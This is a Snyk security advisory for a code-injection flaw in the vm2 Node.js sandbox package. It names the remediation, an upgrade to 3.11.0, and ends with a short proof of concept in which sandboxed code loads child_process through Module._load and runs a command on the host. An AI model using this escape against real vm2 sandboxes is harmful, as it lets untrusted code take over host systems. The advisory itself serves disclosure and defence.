Arbitrary Code Injection Affecting vm2 package, versions >=3.9.18 <3.11.0
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsSnyk Learn
Learn about Arbitrary Code Injection vulnerabilities in an interactive lesson.
Start learning- Snyk IDSNYK-JS-VM2-16438950
- published7 May 2026
- disclosed7 May 2026
- creditBugbunny
Introduced: 7 May 2026
NewCVE-2026-43999 (opens in a new tab)How to fix?
Upgrade vm2 to version 3.11.0 or higher.
Overview
vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules.
Affected versions of this package are vulnerable to Arbitrary Code Injection through lib/builtin.js. An attacker can execute host code when the allowlist includes -X or uses * and then calls require('module')._load('child_process') from sandboxed code. The same host-passthrough path also exposes worker_threads, cluster, vm, repl, and inspector, letting sandboxed code spawn host processes, run unsandboxed JavaScript, or attach to the host process.
PoC
const { NodeVM } = require('vm2');
// Developer thinks child_process is blocked
const vm = new NodeVM({
require: {
builtin: ['*', '-child_process'],
external: false,
},
});
const out = vm.run(`
const Module = require('module');
// Module._load bypasses vm2's builtin allowlist entirely
const cp = Module._load('child_process');
module.exports = cp.execSync('id').toString();
`, 'poc.js');
console.log(out.trim()); // prints host uid/gid — RCE achieved